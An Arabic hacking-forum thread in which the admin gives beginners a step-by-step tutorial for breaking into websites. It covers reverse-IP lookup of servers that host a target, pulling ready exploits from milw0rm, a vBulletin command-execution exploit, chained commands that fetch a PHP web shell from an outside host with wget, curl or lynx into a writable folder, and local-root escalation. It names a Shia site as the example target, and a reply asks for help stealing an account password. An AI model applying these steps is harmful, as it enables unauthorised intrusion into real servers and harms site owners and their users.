منتديات الهكرز المتقدم
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بتسجيل
ما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
كما يشرفنا أن تقوم بالتسجيل
منتديات الهكرز المتقدم
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بتسجيل
ما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
كما يشرفنا أن تقوم بالتسجيل
منتديات الهكرز المتقدم
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات الهكرز المتقدم

اتصال بي عبر S corpion
 
الرئيسيةWelcomeأحدث الصورالتسجيلدخول

 

 حيل وطرق لاختراق المواقع ,

اذهب الى الأسفل 
4 مشترك
كاتب الموضوعرسالة
Scorpion
Admin
Admin
Scorpion


عدد المساهمات : 529
نقاط : 3138
السٌّمعَة : 80
تاريخ التسجيل : 15/11/2010
الموقع : www.logsail.c.la

حيل وطرق لاختراق المواقع , Empty
مُساهمةموضوع: حيل وطرق لاختراق المواقع ,   حيل وطرق لاختراق المواقع , Icon_minitimeالجمعة نوفمبر 26, 2010 5:57 pm

السلام عليكم ورحمه الله وبركاته ..

اول شي ابري ذمتي و منتديات العاصفه قدام الله وخلقه من اطفال الشل و اطفال هكر الاجهزه اللي يفكرون الدعوه ارسل باتش وانا برئ منهم اما الله من مايصير من ضلم وتهكم واستغلال اي ثغره واستغلالها في التخريب سواءا كان الموقع تعليمي اسلامي او ماله اي دخل .. والله على ما اقول شهيد .. الا هل بلغت؟؟ اللهم فشهد &


فضلا اقرا هذه الكلمه :اعاهد الله ونفسي ان لا اضر من لا يستحق الضرر لمجرد اثبات النفس او اللعب


في البدايه حبيت ابين لكم بعض المعلومات واشياء ,, وحبيت اقولكم ان الهكر مو شي صعب او مستحيل مجرد تطبيقك وفهمك وممارستك سوف تصل لمراحل لم تتوقع الوصول اليها ولكن لكل مجتهد نصيب ,,

ياشباب يمكن ماعندي ذيك الخبره في كتابه المواضيع وطريقه وضع المقدمه وتنسيق الموضوع فإعذروني في ذلك لكن المقصد اني اوصل المعلومه ,,

اولا بالنسبه لاختراق المواقع فهو كإختراق الاجهزه ,, .؟! نعم انه كإختراق الاجهزه فهو نفس الفكره تقريبا ولكن تختلف الاساليب ,, فهناك بعض الفروقات اللي تجعل هكر المواقع غامض عند البعض ,,

ولكن على فكره فإن الذي يستطيع اختراق جهاز ممكن ان يخترق موقع يعني لو تعلمت اختراق الاجهزه ثم انتقلت لهكر المواقع فإن هذا سيكون دافع لتبسط المسأله امامك ’,,

ابعطيكم فكره بسيطه ,,
اختراق الجهاز يتم عن طريق ارسال خادم او باتش او كما اردت تسميته يقوم بفتح منفذ معين وينتضر منك الاتصال لكي تقوم بتحكم بنظام المصاب ,,
كذلك المواقع نفس الفكره تقدر تضع خادم او باكدور يقوم بنفس الوضيفه يفتح لك منفذ لتتصل وتتحكم بالنظام المخترق .,.
ولكن لحضه ,,,,,,,,,,,, شوفو الفرق ,, انت في اختراق الجهاز تحتاج للتحايل على الضحيه عشان يفتح الباكدور

ولكن في المواقع راح تستخدم الثغرات عشان ترمي الباكدور بداخل الموقع وتشغله

وبالتالي وصلت لنفس الهدف وهو الدخول لنظام .

طيب يجيني واحد ويقولي كيف اعرف الثغرات ,, اقوله ماعليك الا انك تابع اخر الثغرات في مواقع عرض الثغرات مثل milw0rm وتابع اخر الثغرات وطبقها واذا مافهمت ثغره معينه حطها في
هههههه الموضوع اللي انا مثبته واسمه طلبات شرح الثغرات وراح اشرح الثغره بالتفصيل ,,

طيب الحين عرفنا من وين نجيب الثغرات وكيف نتعامل معها ,, ولكن لحضه هناك معلومه لازم تعرفها

الموقع مساحه على سيرفر يعني

السيرفر يحتوي العديد من المواقع مثلا سيرفر العاصفه هوست عليه موقع العاصفه وموقع المشاغب وموقع اسلاميات وموقع الشيعه دوت كم Very Happy
انت تريد ان تصل الى موقع الشيعه وتسيطر عليه ,,

اول شي تروح لموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وتضع اسم الموقع بعده like this

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بيطلع لك اسم المستضيف والمعلومات ومن والى ,, ومن ضمنها رقم الاي بي اضغط على رقم الاي بي بيطلع لك الموقع اللي على السيرفر مثل كذا
3asfh.com
absba.com
aslamyat.com

طيب انت فحصت موقع الشيعه ولافيه ثغرات وعرفت المواقع اللي على السيرفر ,,

انتقل الى المشاغب مثلا وافحصه والعاصفه واسلاميات بعدها وجدت ثغره في المشاغب مثلا ,,
ادخل الى هذي الثغره وطبقها طبعا احسن شي اذا كانت كوماند وراح ابين انواع الثغرات بعد شوي

طبعا صارت الثغره كوماند يعني تتيح لك استخدام الاوامر على السيرفر طبعا بالاوامر ايضا تسحب الشل وهذا هو عقده المبتدئين وهو ملف يقوم بتعامل مع النظام

يعني مثل الدوس في الوندز ,, مو انت تستطيع التعامل مع الوندز من خلال الدوس ؟؟ يعني تقدر تمسح ملف مثلا وتدخل المستندات وتطلع منها بالاوامر وكل هذا عن طريق الدوس
نعم هذا مثله في اللينكس يستخدم موجه اوامر ويسمونه الشل و Phpshell هو اللي يستخدمونه كثير من الهكر وهو سكربت يتيح لك الدخول للشل حق النظام بدون صلاحيات ,
طبعا بعد ماتسحب سكربت الشل وتشغله على الموقع راح تحصل نفسك على السيرفر ’,, طبعا هناك طريقتين يا انك تاخذ روت على السيرفر او انك تنتقل للموقع المستهدف مباشره وسأوضح ذلك في دروس متقدمه ,,,
وبكذا تكون وصلت للموقع المراد طبعا عن طريق الروت يعني عن طريق اكسبلوت معين تسوي له ترجمه وتشغله وانت على الشل ويعطيك صلاحيات الروت يعني المدير في نظام اللينكس ,,

وطرق لاختراق المواقع


يووو باقي على الاختبار عشر دقايق بربب

برجع اعدل الموضوع
-------------
باك رجعنا Very Happy

الان بعد ماعرفنا الفكره العامه وشلون والخدع والحيل الي يتم استخدامها للوصل للهدف بشكل عام بنحاول ندخل شوي ونتعمق في الدرس اكثر....

طيب نقطه البدايه تقول والله انا انسان مبتدئ ولا اعرف اسوي شي قدامي ذا الموقع ابي اخترقه وش اسوي؟؟
ماراح اقولك مثل باقي المواضيع رح دور ثغرات واخترقه ومدري ايش لا خلونا ناخذها خطوه خطوه بالاسهل فالاصعب ,,

طبعا حدد الهدف
الهدف= اختراق الموقع
سواءا بتغير الصفحه الرئيسيه ولا دخول للمنتدى واختراقه ولا الدخول للشل والاستفاده من السيرفر كامل...

بعد ماتفتح الصفحه الرئيسيه تفصحه بعينطك مايحتاج تروح تجيب برامج سكان ومدري ايش الا اذا كنت تحب برضو مايمنع اخي العزيز لانه الانسان ممكن ينسا شي او يمر عليه شي

قبل لا ابدا في النقطه الجايه بوضح لكم حاجه
الثغرات انواع وتختلف خطورتها ,,
اول شي في حاجه اسمها ريموت يعني عن بعد ويسمونها remot وهذا اخطر من الوكال , وهذا النوع يقصد به التحكم عن بعد وانت على جهازك تشغل الثغره وتحط اي بي الموقع او ايا كان شكل او طريقه عمل الثغره راح تستغل معك

والوكال تكون وانت محلي على السيرفر ويسمونها local , اما هذا النوع ويقصد به محلي يعني انك لازم تكون على الشل مثلا يعني متواجد على السيرفر

وهناك انواع من الثغرات

SQL Injection Exploit
Command Execution Exploit
Local File Include Exploit
Buffer Overflow
Denial of Service Exploit

وهناك العديد ايضا منها اضافه ادمن او دخول بدون باسورد وممكن تندرج تحت السكل انجكشن ,,
طبعا سناخذ الثغرات اللي فوق وافصلها لكم,
1/SQL Injection Exploit
وهذا النوع من الثغرات يعتبر او لا اريد ان اصنفه احسن لانه ممكن استخدامه في امور اخرى ولكنها لم تنشر بعد ,, هذا النوع يتعامل مع قواعد البيانات دائما اي انه يستغل اخطاء البرمجه للدخول لقاعده سواءا لقرائه محتويات منها او للكتابه بداخل القاعده كالتعديل على محتوياتها او اضافه ادمن ,, او لو تذكرون ثغرات في vb ثغره هاك الالعاب واخر عشره مواضيع هذي من النوع هذا زي ماشفتو يدخل للقاعده عن طريق استعلام معين ويطلع الباسورد يعني استطاع ان يدخل للقاعده وكلكم عارفين ان قاعده البيانات تحتوي حاجات مهمه مثل عنوان بريدات كل الاعضاء والباسوردات وغيرها .

2/Command Execution Exploit
هذا احسن نوع عندي وافضله ويفضلونه الكثير من الهكر , وظيفه هذا النوع من الثغرات يعطيك شل على السيرفر او الموقع المستهدف ويحتوي هذه الثغره , وتقدر من بعدها التحكم وسحب سكربت شل phpshell الى الموقع والتعامل مع الموقع كنك تعدل على جهاز وندز وعلى حسب الصلاحيات اذا كان لك صلاحيات معناه تقدر تعدل وتمسح وتسوي كل شي واذا كنت nobody احسن واحسن حيث انك تقدر تستعرض المواقع اللي على السيرفر وتتنقل بينها

3/Local File Include Exploit
هذا النوع شبيه باللي قبل يعطيك شل من خلال اضافه رابط الشل حقك ويكون بمتداد gif مثلا او txt وتقدر تطبق الاوامر

4/Buffer Overflow
هذا النوع قوي جدا سواءا في المحلي اللوكال ولا الرموت لانه يسوي طفح للذاكره ويغرقها الى ان يحول صلاحياتك الى مدير النظام

5/Denial of Service Exploit
هذا تقدر تقول سخيف شوي ,, لكن بما انها ثغره نحترمها Very Happy
ووظيفتها حجب الخدمه يعني مثل اللي صار في موقع المجله الدنماركيه يستغل ضعف ويغرق النظام الي ان يعطل الموقع عن العمل ويسمونه (هجوم حجب الخدمه) DoS

الحين فهمنا انواع الثغرات ,,

لنفرض اسم الموقع المستهدف اسمه [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بعد ماتشوف الصفحه الرئيسيه وهي عباره عن
منتدى -سجل زوار -البوم صور - بطاقات مكتبه برامج -مجله -البوم شعر

ناخذه وحده وحده
1: المنتدى/ تروح تشوف وش اصداره ونوعه على طول ,

مثلا صار هذا النوع : vBulletin Version 3.0.4

طيب تروح لمواقع الثغرات وانصحكم بهذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لانه يحط الثغرات بستغلالتها جاهزه
وتبحث عن ثغرات هذا الاصدار سواءا بزر البحث فوق او عن طريق الدخول الا ثغرات السكربتات وبعدها اختار vBulletin وشف الاصدار اللي تبيه له ثغرات ولالا
طبعا بتحصل من الثغرات الموجوده لهذا الاصدار فيه ثغره نشوف صوره

وطرق لاختراق المواقع

الان بعد ماضغط على زر الثغره راح يطلع لك التالي عاد على حسب الثغره بالبيرل ولا بال php ولا مكتوب الاستغلال على طول من المتصفح كلها شرحتها في مواضيع مثبته بالقسم , راح يطلع الكود التالي

كود PHP:
Exploit:
----------------
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Conditions:
----------------
1st condition : $vboptions['showforumusers'] == True , the admin must set
showforumusers ON in vbulletin options.

2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.

4th condition : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 Wink))

# milw0rm.com [2005-02-14]
طيب وش معناه الكلام ذا ؟!,,
يقولك ان الثغره تستغلها عن طريق اضافه الرابط هذا
كود PHP:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتحط بدال site الموقع المستهدف ومعطيك شروط لاشتغال الثغره بس انت ماعليك منه رح طبق وشف وش يصير طبعا مو شرط تستخدم هذي الثغره فقط كل موقع او كل اصدار وثغراته

طيب نروح للمنتدى ونكتب وراه الكود اللي عطانا
مثل ماقلنا اول انه فرضا اسم الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] والمنتدى لنفرض انك ضغطت على رابط المنتدى وصار اسم المجلد vbيعني صار الرابط
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نضيف الرابط بعده
كود PHP:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتشوف مكان id هو مكان الامر اللي نحطه والاوامر تفصيلها مذكوره في دروس ثانيه ماودي اتدرج لها لانها شرحت ولو بشرحها هنا ماراح نخلص ,,
طيب بعد ماكتبت id وطلع لك مثلا

uid=100(apache) gid=500(apache) groups=500(apache)
او
uid=100(nobody) gid=500(nobody) )

كويس تنفذت الثغره كويس وعطاك رد وهو انك حالتك نو بدي على السيرفر ,,
الحين اكتب pwd لمعرفه مكانك على السيرفر
وبعدين ls -al عشان تشوف المجلدات والملفات وتصاريحها ودور مجلد يحمل تصريح 777 وبتشوف قدامه drwxrwx هذا على طول تدخله وتسحب له الشل بطريقه هذي


cd امر الدخول
ومثلا قالك مسارك على السيرفر كذا بعد ماكتبت pwd
كود PHP:
/home/domains/admin.com/public_html/vb
وشفت ان مجلد اسمه data يحمل التصريح 777
تروح تكتب
كود PHP:
cd home/domains/admin.com/public_html/vb/data
مو بس لا لازم تكتب الامر اللي فوق وتشبك فيه امر السحب بعد عشان ينفذ امرين الدخول والسحب , ويكون بالطريقه هذي,

كود PHP:
cd home/domains/admin.com/public_html/vb/data;wget [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] -al
لو لاحضتو كل امر نفصله بهذي العلامه ; وزدنا امر استعراض الملفات ايضا يعني بيسوي كذا امر
امر الدخول+امر السحب+امر الاستعراض


طبعا انت تكون رافع الشل وضاغطه في ملف مضغوط وتسحب بالطريقه اللي وضحتها اذا شفته انسحب اوكيه اذا مانسحب تاكد من صلاحيه الامر wget بكتابه الامر التالي
which wget
اذا عطاك مسار مشابه لهذا
/usr/da/
يعني اوكي شغال
او جرب باقي اوامر السحب مثل curl و get و lynx كل هذي تادي الغرض وتفك مشاكل كثيره يعانون منها المبتدئين

جرب الاداه curl
وسحب بالطريقه هذي

curl -o shell.zip [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

او بـ get
بالطريقه التاليه ,
GET [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] > shell.zip

او بـ lynx
بالطريقه التاليه
lynx -source [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] > shell.zip

بعد ماسحبته واستعرضت وشفت ان الملف موجود تكتب الامر هذا


كود PHP:
cd home/domains/admin.com/public_html/vb/data;unzip shell.zip;ls -al
طبعا لازم تكتب امر الدخول كل مره بس تضيف عليه اي امر اضافي لانك تبي تطبق على المجلد اللي يحمل التصريح مو على المجلد اللي انت فيه
طيب بعد مافكيت الشل وصار shell.php
تروح تطلبه من المتصفح وبعدها شوف الموقع قدامك بمكانك فعل ما اردت او انتقل الى هذا الدرس وطبق


اذا رفعت شل فانت تستطيع اختراق جميع البرامج على الموقع , (اذا رفعت شل فانت تستطيع اختراق جميع البرامج على الموقع ,)

او بإمكانك اذا كانت طموحك اعلى السيطره السيرفر كاملا انتقل الى مكتبه الوكال روت من خلال الرابط التالي

مكتبـة الوكال روت والباكدور Local root &backdoor (مكتبـة الوكال روت والباكدور Local root &backdoor)

وارفع الوكال المناسب وشغله ومبروك الروت
الروت = root = مسؤل النظام في اللينكس

طيب الان خلصنا من السيطره على الموقع والسيرفر من خلال اول نقطه وهي المنتدى ننتقل للي بعده ....

سجل الزوار :. نروح نشوف له ثغرات ؟؟ اذا له ثغرات اوكي طبق واذا ماله انتقل للي بعده
البوم الصور:. تروح نفس الشي تشوف نوعه واصداره ولو كان مثلا من نوع 4images
و 4images سكربت البوم صور للي مايعرفه اوكي تروح نفس ماتعلمنا فوق تدور على ثغرات له لقيت اوكي طبق مالقيت انتقل للي بعده اوكي طيب لقينا ثغره شوفو الدرس هذا فيه تطبيق للثغره

طـريقة استغـلال ثغـرات الـ php مـع التطبيق , (طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,)

وفيه شرح لاستخدام مثل هذي الثغره ,,

طيب الحين خلصنا من الاختراق عن طريق السكربتات اللي مركبه على الموقع ,,
ننتقل لمرحله اكثر تقدم
نروح لموقع netcraft.com

وتكتب في المربع اسم الموقع اللي تبيه
بيطلع لك معلومات الموقع من الاي بي للموقع والخدمات المركبه على السيرفر وهكذا ومثلا عطاك المعلومات التاليه :

كود PHP:
202.75.49.183 Linux Apache/1.3.34 Unix mod_ssl/2.8.25 OpenSSL/0.9.7a PHP/4.4.2 mod_perl/1.29 FrontPage/5.0.2.2510
ناخذه وحده وحده
النظام يشتغل على Linux
ومركب سيرفر Apache اصدار 1.3.34
اول شي تشوف لينكس وثغراته زي ماتعلمنا قبل
بعدين انتقل للاباتش ودور له ثغرات لذا الاصدار ,, واذا مالقيت او ماضبط انتقل للي بعده
mod_ssl/2.8.25 مود يتركب على سيرفر الاباتش وشف له ثغرات
OpenSSL/0.9.7a دور له ثغرات
PHP/4.4.2 // // //


........................ وهكذا ,,, برب وراجع (وجهه مستحي من كثر مايقول برب) <--الضاهر انه توه عارف ذا الكلمه Very Happy

بررجع اكمل الموضوع لا تروحون .........(اوعا تغمز عنيك) (الموضوع متجدد) لانه امس كان مقدمه واليوم كملت وبرجع اكمل انا اسف على التقطع اعذروني اخواني
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www.logsail.c.la
صقر الباديه
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 1
نقاط : 1
السٌّمعَة : 0
تاريخ التسجيل : 24/06/2012

حيل وطرق لاختراق المواقع , Empty
مُساهمةموضوع: رد: حيل وطرق لاختراق المواقع ,   حيل وطرق لاختراق المواقع , Icon_minitimeالأحد يونيو 24, 2012 4:16 am

Questionوين التحميل الرابط وشكرن
الرجوع الى أعلى الصفحة اذهب الى الأسفل
voldlorte
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 10
نقاط : 16
السٌّمعَة : 0
تاريخ التسجيل : 28/02/2013

حيل وطرق لاختراق المواقع , Empty
مُساهمةموضوع: رد: حيل وطرق لاختراق المواقع ,   حيل وطرق لاختراق المواقع , Icon_minitimeالجمعة مارس 01, 2013 2:53 pm

بارك الله فيك اخي الكريم
الرجوع الى أعلى الصفحة اذهب الى الأسفل
hhssbb
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 1
نقاط : 1
السٌّمعَة : 0
تاريخ التسجيل : 02/04/2013

حيل وطرق لاختراق المواقع , Empty
مُساهمةموضوع: رد: حيل وطرق لاختراق المواقع ,   حيل وطرق لاختراق المواقع , Icon_minitimeالثلاثاء أبريل 02, 2013 4:58 pm

لو سمحت اننا اريد اخترق صفحه في الاسك بس بدون ما اغير شي فيها
بس اريد يكون عندي الباسوورد واقدر ادخل عليه بسهوله
اتمنى تفيدنني Sad
مشكور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
حيل وطرق لاختراق المواقع ,
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» برنامج الهافج الشهير لاختراق المواقع بثغرة السكيول Havij 1.15 Free
» برنامج الصاعقه لاختراق الاجهزه...!!!
» (*مقدمة*)::: ~...دورة احترافية لاختراق الاميل...~
» دورة أحترافيه لاختراق الاجهزه كامله ... !! ~~
» اسطوانة اختراق المواقع

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الهكرز المتقدم :: قسم الاختراق المواقع-
انتقل الى: